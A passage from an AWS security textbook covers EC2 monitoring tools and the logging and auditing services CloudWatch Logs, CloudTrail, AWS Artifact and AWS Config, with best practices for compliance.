have to worry about managing the infrastructure for log management for your
EC2 instances.
EC2 monitoring scripts: You can write scripts in Perl or Python to monitor your
EC2 instances through custom metrics that are not natively provided by AWS
CloudWatch. Some of these metrics are memory, disk, and so on, and are not
available in AWS CloudWatch because AWS does not have access to the
operating systems of your EC2 instance.
AWS Management Pack for Microsoft System Center Operations Manager:
You can link your EC2 instances with operating systems such as Linux or
Windows running inside these EC2 instances with the help of this pack. It is an
extension to the existing Microsoft System Center Operations Manager. You can
access and monitor applications running on your AWS resources with the help of
this AWS Management Pack and gain deep insights about the health and
performance of these applications. This pack uses metrics and alarms to monitor
your AWS resources in AWS CloudWatch. These metrics and alarms appear as
performance counters and alerts in the Microsoft System Center.
By using this pack, which is available in the form of a plug in, you can view
all your resources in a single Operations Manager console. You need to
download and install it to use it.
Monitoring in AWS
[ 179 ]
You can monitor the following AWS resources, among many others that are shown in the
following figure:
EC2 instances
EBS volumes
CloudWatch alarms
CloudWatch custom alerts
CloudFormation stacks
Elastic beanstalk applications
The AWS Management Pack for System Center 2012 Operations Manager can discover and
monitor your AWS resources, such as EC2 instances, Elastic Load Balancers, and so on, by
using management servers that are part of a resource pool. This pool can get additional
capacity by adding more management servers if the number of AWS resources to be
monitored is increased.
A typical AWS Management Pack has multiple components as shown in the following
figure:
Operations manager infrastructure: This consists of management servers, one or
multiple servers that can be deployed either on-premises or in AWS. This
infrastructure also includes dependencies for these servers including Microsoft
SQL Server and so on.
Resource pool: This pool consists of one or more management server that have
internet connectivity for communicating with AWS through AWS SDK for .NET.
AWS credentials: These credentials include an access key ID along with a secret
access key. These credentials are passed in API calls to AWS by management
servers. AWS Management Pack needs to be configured with these credentials.
AWS recommends that an IAM user with read-only access is created along with
these credentials.
Monitoring in AWS
[ 180 ]
EC2 instances: You will install an operations manager agent on these EC2
instances in order to see the operating system and application metrics along with
EC2 instance metrics. These are virtual computers in the AWS cloud.
Figure 12 - AWS Management Pack
Manual monitoring tools
While AWS provides multiple tools, services, and solutions to automate monitoring for
your EC2 instances, there are data points and items that are not covered by these automated
monitoring tools. For such items, we need to rely on EC2 dashboards and CloudWatch
dashboards available in the AWS Management Console. Let us look at these two
dashboards:
Monitoring in AWS
[ 181 ]
EC2 dashboard: The EC2 dashboard shows the following information about your
EC2 instances and the environment in which your EC2 instances are running:
Service health and scheduled events for the selected region
Instance state
Status checks
Alarm status
Metric details for instances
Metric details for volumes
CloudWatch dashboard: You can use the CloudWatch dashboard to troubleshoot
issues related to EC2 instances and monitor the metrics trends. These trends can
be analyzed to provide insights about health and performance of your AWS
resources including your EC2 instances. You can search and plot metrics on
graphs for your EC2 instances. Alongside this, you can also see the following
information on the CloudWatch dashboard:
Current alarms and their status
Graphs of alarms and resources
Service health status
Best practices for monitoring EC2 instances
Let us look at the following best practices for monitoring EC2 instances:
Ensure monitoring is prioritized for hiving off small issues before they become
big problems; use the drill down approach
Create and implement a comprehensive monitoring plan as discussed earlier in
this chapter
Use AWS CloudWatch to collect, monitor, and analyze data for all your resources
in all regions
Automate monitoring of all your resources
Continuously monitor and check log files for your EC2 instances
Periodically review your alarms and thresholds
Use one monitoring platform to monitor all your AWS resources and applications
running on these AWS resources
Integrate metrics, logs, alarms, and trends to get a complete picture of your entire
environment
Monitoring in AWS
[ 182 ]
Summary
In this chapter, we learnt about monitoring the cloud and how AWS CloudWatch enables
us to monitor all resources in AWS cloud through its various features, and the benefits of
using AWS CloudWatch. We also went through its architecture in detail.
We learnt about all the components of AWS CloudWatch such as metrics, alarms,
dashboards, and so on, to create a comprehensive monitoring solution for our workload.
We now know how to monitor predefined and custom metrics as well as how to log data
from multiple sources, such as EC2 instances, applications, AWS CloudTrail, and so on.
Next, we learnt about monitoring EC2 instances for our servers in the cloud. We went
through various automated and manual tools available in AWS to monitor our EC2
instances thoroughly. We deep dived into AWS Management Pack, which helps us to
monitor all our resources in AWS and outside of AWS in one common console.
Lastly, we learnt about the best practices for monitoring EC2 instances.
In the next chapter, Logging and Auditing in AWS, we will learn how logging and auditing
works in AWS. These two activities go hand in hand for any environment, and AWS
ensures that its users have all the information they require when it comes to logging and
auditing. Most of the AWS service generates logs for all activities, and AWS has one fully
managed service in AWS CloudTrail that logs all API activities for your AWS account.
We will learn about these AWS services, and we will also learn about creating a fully
managed logging and auditing solution, in the next chapter.
8
Logging and Auditing in AWS
Logging and auditing are required for any organization from a compliance and governance
point of view. If your organization operates in one of the highly regulated industries such
as banking, financial services, healthcare, and so on, then it must go through frequent
security audits in order to maintain compliance with industry regulations. These audits can
be internal or external depending on the nature of your business.
We learnt in the previous chapters that security of the IT environment is a shared
responsibility between AWS and its customers. While AWS is responsible for maintaining
security of resources, tools, services, and features available in the AWS cloud, the customer
is responsible for configuring security for all these services and the security of their data.
AWS communicates information related to security with customers periodically by taking
the following steps:
Obtaining industry standard certifications
By third party audits and attestations
Publishing white papers and content about the security infrastructure
Providing audit certifications and other regulatory compliance documents to
customers
Logging refers to recording activities for your resources. A log data from your resource is
required to understand the state of your resource at a given point in time and also for
communications and data transfer to and from your resource. Logging also enables you to
diagnose and mitigate any issue either reported, discovered, or expected for a resource or
multiple resources in your system. This logged data is generally stored in a separate storage
device and is used for auditing, forensics, and compliance purposes as well. Logged data is
often used long after the resource that generated the log data is terminated. Logging is a
reactive security measure.
Logging and Auditing in AWS
[ 184 ]
Each AWS service provides log data in the form of log files, this data is used to get
information about the performance of this service. Moreover, many AWS services provide
security log data that has information about access, billing, configuration changes, and so
on. These log files are used for auditing, governance, compliance, risk management, and so
on.
AWS provides you with a fully managed service AWS CloudTrail to log and audit all
activities in your account. This includes operational auditing and risk auditing as well.
Furthermore, you can use AWS-managed services such as Amazon S3, Amazon
CloudWatch, Amazon ElasticSearch, and so on to create a centralized logging solution to
get a comprehensive view of your IT environment, including all resources, applications,
and users.
AWS has one the most effective and longest running customer compliance program
available today in the cloud market. AWS enables its customers and partners to manage
security controls in the cloud with the help of compliance tooling's largest and most diverse
compliance footprint. All these features together allow; AWS customers and partners to
work with their auditors by providing all the evidence required for effective control of IT
operations and security and data protection in the cloud.
A secured cloud environment is a compliant cloud environment. AWS offers you a cloud-
based governance for your environment with a number of advantages, such as a lower cost
of entry, configurable and secure operations, agility, a holistic view of your entire IT
environment, security controls, governance enabled features, and central automation. While
using AWS, you inherit all the security controls operated by AWS, thereby reducing your
overhead on deploying and maintaining these security controls yourselves.
In this chapter, we will learn about logging, auditing, risks, and governance in the AWS
cloud and how they are integrated with each other. We will begin with understanding
logging in AWS, how logging works for various AWS services in AWS and what tools and
services are available to work with log data of different shapes and sizes generated from a
myriad of resources in your IT environment. While going through logging, we'll learn about
the following:
AWS native security logging capabilities
AWS CloudWatch Logs
Logging and Auditing in AWS
[ 185 ]
Next, we will learn about AWS CloudTrail, a fully managed audit service that logs all API
activities in your AWS account. This service is at the heart of governance, logging, and
auditing in AWS along with AWS CloudWatch Logs. It also helps with compliance and risk
monitoring activities. We will learn about CloudTrail concepts before moving on to deep
dive in to features and use cases of AWS CloudTrail. Moreover, we will learn how to have
security at scale through logging in AWS and best practices for AWS CloudTrail.
Moving on, we will walk through auditing in AWS. We will walk through the following
resources provided by AWS:
AWS Compliance Center
AWS Auditor Learning Path
AWS has many resources to audit usage of AWS services. We will walk through a fully
managed service AWS Artifact to obtain all security and compliance related documents.
Furthermore, we will learn how we can use the following AWS services for risk,
compliance, and governance in the AWS cloud in a variety of ways:
AWS Config
AWS Service Catalog
AWS Trusted Advisor
We will wrap up the auditing section by going through the following auditing checklist and
learning about other available resources for auditing AWS resources:
AWS auditing security checklist
Logging in AWS
AWS has a complete suite of services to cater to all your logging needs for adhering to your
security and operational best practices, as well as meeting your compliance and regulatory
requirements. So, you have all the logs that you need to capture, with storage, monitoring,
and analyzing facilities available in AWS, keeping the dynamic nature of cloud computing.
Logging and Auditing in AWS
[ 186 ]
To begin, let us look at various logs available in AWS. All the logs in AWS can be classified
into three categories, as shown in the following table:
AWS infrastructure logs AWS service logs
Host-based logs
AWS CloudTrail
Amazon S3
Messages
AWS VPC flow logs
AWS ELB
IIS/Apache
Amazon CloudFront Windows Event logs
AWS Lambda
Custom logs
Table 1 - AWS logs classification
AWS infrastructure logs, such as CloudTrail Logs, contain information related to all API
activity in your AWS account, while VPC flow logs contain information regarding your IP
traffic flowing in and out of your VPC.
AWS service logs include logs from miscellaneous AWS services that contain information
such as security log data, service access information, changes related to configuration and
state, billing events, and so on.
Host-based logs are generated by the operating system of EC2 instances, such as Apache,
IIS, and so on. Applications running on AWS services or custom logs are generated by web
servers.
All of these logs generated by various sources will have a different format, size, frequency,
and information. AWS provides you with services and solutions to effectively manage,
store, access, analyze, and monitor these logs.
AWS native security logging capabilities
Let us look at the best practices for working with log files and native AWS Security logging
capabilities for some of the foundation and most common AWS services.
Logging and Auditing in AWS
[ 187 ]
Best practices
Let us look at best practices for logging:
You should always log access and audit information for all your resources
Ensure that all your log data is secured with access control and stored in a
durable storage solution such as S3, as shown in the following figure
Use lifecycle policies to automate storage, archiving, and deletion of your log
data
Follow standard naming conventions for your log data
Use centralized log monitoring solutions to consolidate all your log data from all
sources, analyze it, and create actionable alerts out of this log data
Figure 1 - AWS access logging S3
AWS CloudTrail
AWS CloudTrail is an audit service that records all API calls made to your AWS account.
You can use this log data to track user activity and API usage in your AWS account. This
service should be enabled for your AWS account to collect data for all regions irrespective
of the location of your resources. This service stores historical data for the last seven days,
you need to store this data in an S3 bucket in order to store it for a longer duration. This
service integrates seamlessly with AWS CloudWatch Logs and AWS Lambda to create a log
monitoring and processing solution. We will deep dive into AWS CloudTrail later in this
chapter.
Logging and Auditing in AWS
[ 188 ]
AWS Config
AWS Config service records the configurations of all AWS resources in your AWS account.
It is used to audit changes to the resource configuration as it provides a timeline of such
changes for specific AWS services. It uses S3 to store snapshots of all such changes so that
your data is stored securely in a durable, access controlled storage. AWS Config integrates
with Simple Notification Service (SNS) to configure the notification to users when changes
are made to a resource. This service enables you to demonstrate compliance at a given point
in time or during a period. We will look at AWS Config in detail later in this chapter.
AWS detailed billing reports
You have the option, to break down your billing report by month, day, or by an hour; by a
product, such as EC2, or by a resource, such as a specific EC2 instance or specific S3 bucket;
or by tags assigned to your resources. These detailed billing reports are used to analyze
usage and audit consumption of AWS resources in your account. These detailed billing
reports are provided multiple times in a day to the S3 bucket of your choice. Always
allocate meaningful tags for your resources to allocate the cost to these AWS resources
based on their cost centers, departments, projects, and so on. Detailed billing reports help
you improve cost analysis, resource optimization, and billing reconciliation processes.
Amazon S3 Access Logs
S3 logs all the requests made to individual S3 buckets when you have enabled the logging
option for an S3 bucket. This access log stores all information about access requests, such as
requester, bucket name, request time, error log, and so on. You can use this information for
your security audits including failed access attempts for your S3 buckets. It will also help
you understand the usage of objects in and across your S3 buckets and traffic patterns along
with mapping your AWS S3 charges with S3 usage. We will look at server access logging
for S3 buckets later in this section.
Logging and Auditing in AWS
[ 189 ]
ELB Logs
ELB provides access logs with detailed information for all requests and connections sent to
your load balancers. ELB publishes a log file in five minute intervals for every load balancer
node once you enable this feature. This log file contains information such as client IP
address, latency, server response, and so on. This information can be used for security and
access analysis to ensure you are not getting traffic from unauthorized sources. You can also
use latency and request time information to detect degradation in performance and take
actions required to improve the user experience. Alternatively, these logs provide an
external view of your application's performance. You can configure an S3 bucket to store
these logs. The following figure shows the logging process for Amazon ELB:
Figure 2 - Amazon ELB logging
Logging and Auditing in AWS
[ 190 ]
Amazon CloudFront Access Logs
Amazon CloudFront can be configured to generate access logs. These logs are delivered
multiple times an hour to an S3 bucket that you specify for saving this log data. These logs
provide information about every user request made to CloudFront distributions just like S3
access logs and ELB access logs. Similarly, this log data can be used for security and access
audits for all your users accessing content throughout your content delivery network. You
can use this data to verify if your content delivery network is performing as per your
expectation. You can check latency of content delivered along with delivery errors and take
required actions based on log data. The following figure shows how logging works for
Amazon CloudFront:
Figure 3 - Amazon CloudFront logging
Amazon RDS Logs
These logs store information such as performance, access, and errors for your RDS
databases. You can view, download, and watch these logs from the AWS Management
Console, CLI, or through Amazon RDS APIs. You can also query these log files through
database tables specific to your database engine. You can use these log files for security,
performance, access, and operational analysis of your managed database in RDS. You
should have an automated process to transfer your log files to a centralized access log
repository such as S3 or Amazon CloudWatch Logs.
Logging and Auditing in AWS
[ 191 ]
Amazon VPC Flow Logs
VPC flow logs capture all information about all IP traffic flowing in and out of your VPC
network interfaces. You can enable flow logs for a VPC, a subnet, or even at a single Elastic
Network Interface (ENI). This log data is stored and viewed in the CloudWatch Logs. It can
also be exported for advanced analytics. This log data can be used for auditing, debugging,
or when you are required to capture and analyze network flow data for security or
regulatory purposes. You can troubleshoot all scenarios when your traffic is not reaching its
expected destination with the help of VPC flow logs. The following figure shows VPC flow
logs being published to the Amazon CloudWatch Logs to store log data in multiple log
streams under one log group:
Figure 4 - Amazon VPC flow logs
Logging and Auditing in AWS
[ 192 ]
AWS CloudWatch Logs
AWS CloudWatch Logs is a monitoring, logging, and log storage feature available as part of
the AWS CloudWatch service. You can consume logs from resources in any AWS region;
however, you can view logs in the CloudWatch for regions where CloudWatch Logs are
supported. Your log data can be encrypted using KMS at the log group level. CloudWatch
Logs are primarily used for performing the following tasks:
Monitoring all your logs in near real-time by routing them to the AWS
CloudWatch Logs; these could be your operating system logs, application logs,
AWS service logs, or AWS infrastructure logs such as VPC flow logs and AWS
CloudTrail Logs
Storing all your logs in a durable storage with configurable retention period
Generating logs for your EC2 instances by installing the CloudWatch Logs agent
on your EC2 instances
Integrated with AWS services such as AWS CloudWatch for creating metrics and
alerts, AWS IAM for secure access to logs and AWS CloudTrail for recording all
API activities for AWS CloudWatch Logs in your AWS account
CloudWatch Logs concepts
Let us now look at the following core concepts of AWS CloudWatch Logs to understand it
better:
Log events: Records of any activity captured by the application or resource that is
being logged. A log event contains the timestamp and event message in UTF-8
format.
Log streams: A sequence of log events from the same source being logged such as
an application or an EC2 instance.
Log group: A group of multiple log streams that share the same properties such
as retention period, policies, access control, and so on. Each log stream is part of a
log group. These log groups can be tagged as well.
Logging and Auditing in AWS
[ 193 ]
Metric filters: A metric filter is used to extract metrics out of the log data that is
ingested by the CloudWatch Logs. A metric filter is assigned to a log group, and
this filter is assigned to all log streams of that log group. You can have more than
one metric filter for a log group.
Retention policies: You define retention policies for storing your log data in
CloudWatch Logs. These policies are assigned to log groups and log streams
belonging to that log group. Log data is automatically deleted once it is expired.
By default, log data is stored indefinitely. You can set up a retention period of 1
day to 10 years.
Log agent: You need to install a CloudWatch log agent in your EC2 instances to
send log data to CloudWatch Logs automatically. An agent contains the
following components:
A plug-in to CLI to push log data to CloudWatch Logs
A script to start pushing data to CloudWatch Logs
A cron job to check that script is running as per schedule
The following figure shows four log groups available under CloudWatch Logs in the AWS
CloudWatch console. It also shows Metric Filters available for one of the log groups
containing 2 filters. Moreover, it shows that retention policies are not set up for any log
group, hence log events are set to Never Expire:
Figure 5 - AWS CloudWatch Logs
Logging and Auditing in AWS
[ 194 ]
The following figure shows log streams for a log group in the AWS CloudWatch console.
You can filter log streams based on text data. You can also create a custom log stream and
you also have an option to delete log streams:
Figure 6 - AWS CloudWatch Log streams
The following figure shows event logs for a log stream in a log group. You can filter events
based on text or phrases such as error or access denied. Note that events contain such
information along with a timestamp, as shown in the following figure. You can view
information for the past 30 seconds up to the time when the event was first logged, as
shown in the following figure:
Figure 7 - AWS CloudWatch events log
Logging and Auditing in AWS
[ 195 ]
CloudWatch Logs limits
Let us look at limits of CloudWatch Logs:
A batch can have a maximum size of 1 MB
5 GB of data archiving is free
An event can have a maximum size of 256 KB
You can get 10 requests for log events per second, per account, per region
5 GB of incoming data is free
You can have up to 5,000 log groups per account, per region. This is a soft limit
and can be increased by contacting AWS support
You can have up to 100 metric filters for every log group
You can have one subscription filter per log group
Lifecycle of CloudWatch Logs
A typical CloudWatch Logs lifecycle begins by installing a log agent on an EC2 instance.
This agent will publish data to the CloudWatch Logs, where it will be part of a log stream in
a log group. This log stream will process events data using filters and metrics will be
created for this log data. Additionally, this log group can have subscriptions to process this
log data in real time.
Logging and Auditing in AWS
[ 196 ]
The following figure shows the lifecycle where logs are published by the CloudWatch Log
agent to the CloudWatch Logs from various EC2 instances inside a VPC. Log agent is
installed in all these EC2 instances. CloudWatch Logs will process these multiple logs and
create CloudWatch metrics, alarms, and notifications for these logs:
Figure 8 - AWS CloudWatch Log agent lifecycle
Alternatively, CloudWatch Logs will have one or multiple logs published by various other
sources apart from the CloudWatch Log agent, such as AWS Lambda, Elastic Load
Balancer, S3 buckets and so on. It will monitor, process, and store all such logs in a similar
fashion as previously described.
Following figure shows logs from the ELB stored in the S3 bucket. Whenever a log arrives
from the ELB in the S3 bucket, this buckets sends an event notification that invokes an AWS
Lambda function. This AWS Lambda function reads this log data and publishes it to the
CloudWatch Logs for further processing:
Figure 9 - AWS CloudWatch Logs lifecycle
Logging and Auditing in AWS
[ 197 ]
AWS CloudTrail
AWS CloudTrail is a fully managed audit service that captures all API activities in the form
of event history in your AWS account for all resources. Simply put, all actions performed by
a user, role, or an AWS service are recorded as events by this service. This includes API calls
made from the AWS Management Console, CLI tools, SDKs, APIs, and other AWS services.
It stores this information in log files. These logs files can be delivered to S3 for durable
storage. AWS CloudTrail enables compliance, governance, risk auditing, and operational
auditing of your AWS account. This event history is used for security analysis, tracking
changes for your resources, analyzing user activity, demonstrating compliance, and various
other scenarios that require visibility in your account activities.
AWS CloudTrail is enabled by default for all AWS accounts. It shows seven days of event
history by default for the current region that you are viewing. In order to view the event
history for more than seven days for all the AWS regions, you need to enable and set up a
CloudTrail. You can view, search, and download this event data for further analysis. These
log files are encrypted by default. These log files are delivered within 15 minutes of any
activity occurring in your AWS account. They are published by AWS CloudTrail
approximately every five minutes.
The following flow diagram shows typical lifecycle for CloudTrail events in five steps:
Account activity occurs.
1.
This activity is captured by CloudTrail in the form of a CloudTrail event.
2.
This event history is available for viewing and downloading.
3.
You can configure an S3 bucket for storing the CloudTrail event history.
4.
CloudTrail will send event logs to the S3 bucket and optionally publish them to
5.
CloudWatch Logs and CloudWatch events as well.
Figure 10 - AWS CloudTrail lifecycle
Logging and Auditing in AWS
[ 198 ]
AWS CloudTrail concepts
CloudTrail events: A record of an activity or an action captured by CloudTrail in
an AWS account. This action can be performed by a user, a role, or any AWS
service that is integrated with CloudTrail for recording events. These events
allow you to get the history of API as well as non-API activities for your AWS
account for all actions performed through the AWS Management Console, CLIs,
AWS SDKs, and APIs.
CloudTrail event history: You get event details for the past seven days by
default. You can view, search, and download these details through CLIs or
through the AWS Management Console for your consumption. This history data
provides insight into activities and actions taken by your users or applications on
your AWS resources and services.
Trails: You use trails to ensure your CloudTrail events are sent either to a pre-
defined S3 bucket, CloudWatch Logs, or CloudWatch events. It is a configurable
item to filter and deliver your events to multiple sources for storage, monitoring,
and further processing. It is also used to encrypt your CloudTrail event log files
using AWS KMS along with setting up notifications using the Amazon SNS for
delivery of event log files. You can create up to five trails in a region.
Accessing and managing CloudTrail: You can access and manage CloudTrail
through AWS Management Console. This console provides a user interface for
CloudTrail for performing the most common tasks such as :
Viewing event logs and event history
Searching and downloading event details
Creating a trail or editing one
Configuring trails for storage, notification, encryption, or
monitoring
Alternatively, you can also use CLIs, CloudTrail APIs, and AWS SDKs to programmatically
access and manage AWS CloudTrail.
Access control: CloudTrail is integrated with IAM, so you can control users and
permissions for accessing CloudTrail in your AWS account. Follow IAM best
practices for granting access and do not share credentials. Use roles instead of
users for all programmatic access and revoke access if service is not accessed for a
while.
Logging and Auditing in AWS
[ 199 ]
AWS CloudTrail benefits
Simplified compliance: You can use AWS CloudTrail for simplifying compliance
audits for internal policies and regulatory standards. AWS CloudTrail supports
automation of event log storage and recording for all activities in your AWS
account. It also integrates seamlessly with AWS CloudWatch Logs that allows
you to search log data, create metric filters for any events that are not following
compliance policies, raise alarms, and send notifications. This automation and
integration enables quicker resolution for investigating incidents and faster
responses to auditor requests with the required data.
User and resource activity visibility: AWS CloudTrail enables you to gain
visibility into user and resource activity for your AWS account by capturing
every single API call, including login to AWS Management Console as well. For
every call it captures, it records information such as who made the call, the IP
address of the source, what service was called, the time of the call, what action
was performed, the response by the AWS resource and so on.
Security analysis and troubleshooting: Using information collected by AWS
CloudTrail, you can troubleshoot incidents in your AWS account quickly and
more accurately. You can also precisely discover operational issues by searching
filtering events for a specific period.
Security automation: Using AWS CloudTrail event logs, you can automate your
security responses for events and incidents threatening security of your
application and resources in your AWS account. This automation is enabled by
AWS CloudTrail integration with AWS CloudWatch events that helps you to
define fully automated workflows for security vulnerabilities detection and
remediation. For example, you can create a workflow that encrypts an Elastic
Block Storage (EBS) volume as soon as a CloudTrail event detects that is was un-
encrypted.
A CloudTrail event captures the following information about an event, as shown in the
following figure:
Event time
User name
Event name
Resource type
AWS access key
Logging and Auditing in AWS
[ 200 ]
Event source
AWS region
Error code
Request ID
Event ID
Source IP address
Resources Referenced
The following figure shows a couple of events in the CloudTrail event log. You can see the
user name, such as root and S3LambdaPutFunction:
Figure 11 - AWS CloudTrail events
AWS CloudTrail use cases
Compliance aid: Uses the history of all activities to verify if your environment
was compliant at a given period in time. IT auditors can use AWS CloudTrail
event log files as a compliance aid. The following figure depicts a typical
workflow for a compliance audit activity that includes AWS resource
modifications log, verification of log integrity, and log review for unauthorized
access:
Logging and Auditing in AWS
[ 201 ]
Figure 12 - AWS CloudTrail compliance audit workflow
Security analysis and automation: IT and security administrators can perform
security analysis and automate the response by analyzing user behavior and
patterns present in log files. The following figure shows a workflow for one such
scenario. A trail is a setup for logging user activity. These logs are ingested into a
log management, and analytics system for analyzing user behavior for any
suspicious activity. An automated action can neutralize a security threat based on
analysis since logs are delivered in near real-time:
Figure 13 - AWS CloudTrail security analysis workflow
Logging and Auditing in AWS
[ 202 ]
Data exfiltration: You can also detect unauthorized data transfer for any of your
resources in your AWS account through the CloudTrail event history. The
following figure depicts a workflow for detecting one such activity based on a
data event log stored in the S3 bucket. Once this suspicious activity is detected,
the security team is notified for further investigation and actions:
Figure 14 - AWS CloudTrail data exfiltration workflow
Operational issue troubleshooting: DevOps engineers and IT administrators can
track changes and resolve operational issues by using API call history available in
the AWS CloudTrail. This history includes details of creation, modification,
deletion of all your AWS resources such as security groups, EC2 instances, S3
buckets, and so on. The following figure shows an example of an operational
issue caused by a change to an AWS resource. This change can be detected by
filtering CloudTrail API activity history for this resource name, such as the name
of the EC2 instance. Once the change is identified, it can either be rolled back or
corrective actions can be taken to resolve operational issues related to this EC2
instance:
Figure 15 - AWS CloudTrail operational issue troubleshooting workflow
Logging and Auditing in AWS
[ 203 ]
Security at Scale with AWS Logging
Logging and monitoring of API calls are considered best practices for security and
operational control. These are also often required by industry regulators and compliance
auditors for organizations operating in highly regulated domains such as finance,
healthcare, and so on. AWS CloudTrail is a web service that logs all API calls in your AWS
environment. In this section, we are going to learn about the following five common
requirements for compliance around logging and how AWS CloudTrail satisfies these
requirements. These five requirements are extracted from the common compliance
frameworks, such as PCI DSS v2.0, FEDRAMP, ISO 27001:2005, and presented in the form
of controls and logging domains:
Control access to log files: One of the primary logging requirements is to ensure
that access to log files is controlled. AWS CloudTrail integrates with AWS IAM to
control access to log files. Log files that are stored in S3 buckets have access
control in the form of bucket policies, access control lists as well as multi-factor
authentication (MFA) for secured access. You can control unauthorized access to
this service and provide granular read and write access to log files through
various features available in AWS.
Receive alerts on log file creation and misconfiguration: A logging service
should send alerts whenever a log file is created or if it fails to create a log due to
an incorrect configuration. When AWS CloudTrail delivers log files to S3 buckets
or to CloudWatch Logs, event notifications can be configured to notify users
about new log files. Similarly, when a log file fails to generate, AWS CloudTrail
can send notifications through SNS in the AWS Management Console.
Manage changes to AWS resources and log files: One of the primary
requirements for many compliance audits is providing change logs for all
resources for addition, deletion, and modification along with security of this
change log itself. AWS CloudTrail stores change logs by capturing system change
events for all AWS resources for any change in the state by API calls made
through AWS Management Console, AWS SDKs, APIs, or CLIs. This API call log
file is stored in S3 buckets in an encrypted format. It can be further secured by
enabling MFA and using IAM to grant read-only access for these S3 buckets.
Logging and Auditing in AWS
[ 204 ]
Storage of log files: Many regulatory compliance programs and industry
standards require you to store your log files for varying periods ranging from a
year to many years. For example, PCI DSS compliance requires that log files are
stored for one year; HIPPA compliance requires that log data is stored for a
period of six years. AWS CloudTrail seamlessly integrates with S3 to provide you
secure, durable, highly available, and scalable storage without any administrative
overhead. Moreover, you can set up lifecycle policies in S3 to transition data to
the Amazon Glacier for archival purposes, while maintaining durability, security,
and resiliency of your log data. By default, logs are set for an indefinite expiration
period in AWS CloudTrail, and you can customize this expiration period starting
from one day and going up to 10 years.
Generate customized reporting of log data: API call logs are used for analyzing
user behavior and patterns by security experts and IT administrators. AWS
CloudTrail produces log data with more than 25 fields to give you insights about
system events for your AWS resources. You can use these fields to create
comprehensive and customized reports for all users who accessed your resources
by any medium. You can use log analysis tools for consuming near real-time log
files generated by AWS CloudTrail and delivered to S3 buckets and other
destinations of your choice. Moreover, AWS CloudTrail Logs events to enable
and disable logging in AWS CloudTrail, thus allowing you to track whether the
logging service is on or off.
AWS CloudTrail best practices
Let us look at best practices for AWS CloudTrail:
Enable CloudTrail in all regions to track unused regions. It is a one-step
configurable option that will ensure all activities are logged across all AWS
regions.
Enable log file validation; this is used to ensure integrity of a log file. These
validated log files are invaluable during security audits and incident
investigations.
Always encrypt your logs at rest to avoid unauthorized usage of your log data.
Always integrate AWS CloudTrail with CloudWatch Logs to configure metrics,
alarms, searches, and notifications for your log data.
Centralized logs from all your AWS accounts are used for a comprehensive and
consolidated overview of your IT environment. Use the cross region replication
feature of S3 to store all logs in one central location.
Logging and Auditing in AWS
[ 205 ]
Enable server access logging for S3 buckets that are storing CloudTrail log files to
ensure all unauthorized access attempts are identified.
Enforce MFA for deleting S3 buckets storing CloudTrail log data.
Use IAM to restrict access to S3 buckets storing CloudTrail Logs. Also ensure
write-only access for AWS CloudTrail is restricted to designated users.
Auditing in AWS
AWS engages with third party auditors and external certifying agencies to ensure all the
controls, processes, and systems are in place for continuous compliance with various
programs, certifications, compliance, standards, reports, and third party attestations.
Responsibility for auditing all controls and layers above physical resources in AWS lies
with the customer, as we learnt while going through AWS shared security responsibility
model. AWS provides all certifications and reports for reviews to the auditors.
AWS provides a customer compliance center to enable its customers to achieve greater
security and compliance in the cloud. This center provides multiple resources such as case
studies and white papers to learn ways to achieve compliance from AWS customers in
highly regulated industries. It has a comprehensive set of resources and documentation to
get your cloud governance plan in action. Visit https://aws.amazon.com/compliance/
customer-center/ to find out more about the customer compliance center at AWS.
AWS has an auditor learning path, designed for users in auditor, compliance, and legal
roles. It teaches skills to audit all solutions deployed on the AWS cloud. AWS has case
studies, white papers, auditing guides, checklists, audit guidelines and various self paced,
virtual classroom and instructor led training in place to learn about auditing your resources,
solutions, and IT environment in AWS cloud to ensure compliance. Visit https://aws.
amazon.com/compliance/auditor-learning-path/ to find out about the AWS auditor
learning path.
In this section, we are going to learn about AWS services that help us with auditing in
various capacities, such as auditing resource configuration through AWS Config or auditing
security best practices through AWS Trusted Advisor. We will look through the AWS
Service Catalog to ensure compliance by allowing pre-defined resources to be provisioned
in our AWS environment. We will begin by learning about AWS Artifact, a fully managed
self-service portal for accessing and downloading all industry certificates and compliance
documents for your AWS resources that are required by your internal and external
auditors.
Logging and Auditing in AWS
[ 206 ]
AWS Artifact
AWS Artifact is an audit and compliance, self-service portal for accessing and downloading
AWS Security and compliance reports and agreement without any additional charge. These
reports include AWS Service Organization Control (SOC) reports, FedRAMP Partner
Package, ISO 27001:2013, and so on from accreditation bodies across geographies and
industry verticals that verify and validate AWS Security controls. AWS Artifact is accessible
from the AWS Management Console.
You can use it for verifying and validating security control for any vertical in any
geography. It helps you to identify the scope of each audit artifact, such as AWS service or
resources, regions, and audit dates as well. AWS Artifact allows you to perform internal
security assessments of your AWS resources. You can continuously monitor and assess the
security of your AWS environment as audit reports are available as soon as new reports are
released. There are agreements available in the AWS Artifact, such as the Business
Associate Addendum and the Non Disclosure Agreement (NDA).
The following image shows key AWS certifications and assurance programs. You can use
AWS Artifact to download reports related to these certifications and programs along with
many other programs and certifications:
Figure 16 - AWS certifications and assurance programs
Logging and Auditing in AWS
[ 207 ]
AWS Config
AWS Config is a fully managed AWS service that helps you capture the configuration
history for your AWS resources, maintain resource inventory, audit, and evaluate changes
in resource configuration, and enables security and governance by integrating notifications
with these changes. You can use it to discover AWS resources in your account, continuously
monitor and evaluate resource configuration against desired resource configuration, export
configuration details for your resource inventory, and find out the configuration details for
a resource at given point in time.
A resource is any object that you create, update or delete in AWS, such as an EC2 instance, a
S3 bucket, a security group, or an EBS volume. AWS Config is used to assess compliance as
per internal guidelines for maintaining resource configurations. It enables compliance
auditing, security analysis, resource change tracking, and operational troubleshooting. The
following image shows the workflow for AWS Config, shown as follows:
A configuration change occurs for your AWS resource.
1.
AWS Config records this change and normalizes it.
2.
This change is delivered to a configurable S3 bucket.
3.
Simultaneously, Config will evaluate this change against your desired
4.
configuration rules.
Config will display the result of configuration evaluation, it can send notifications
5.
of this evaluation as well if required.
Figure 17 - AWS Config workflow
Logging and Auditing in AWS
[ 208 ]
AWS Config use cases
Continuous audit and compliance: AWS Config continuously validates and
assesses the configuration of your resources against the configuration required as
per your internal policies and compliance requirements. It also generates reports
for your resource inventory and AWS infrastructure configurations for your
auditors.
Compliance as code: You can enable your system administrators to codify your
best practices as Config rules for your resources to ensure compliance. These
config rules can be custom rules created in AWS Lambda as per your compliance
requirement. You can set up a rule as a periodic rule to run at configurable
frequency or as a change triggered rule to run when a change is detected in
resource configuration. AWS Config allows you to enforce self-governance
among your users and automated assessments.
Security analysis: Config rules can aid security experts in detecting anomalies
arising out of a change in resource configuration. With the help of continuous
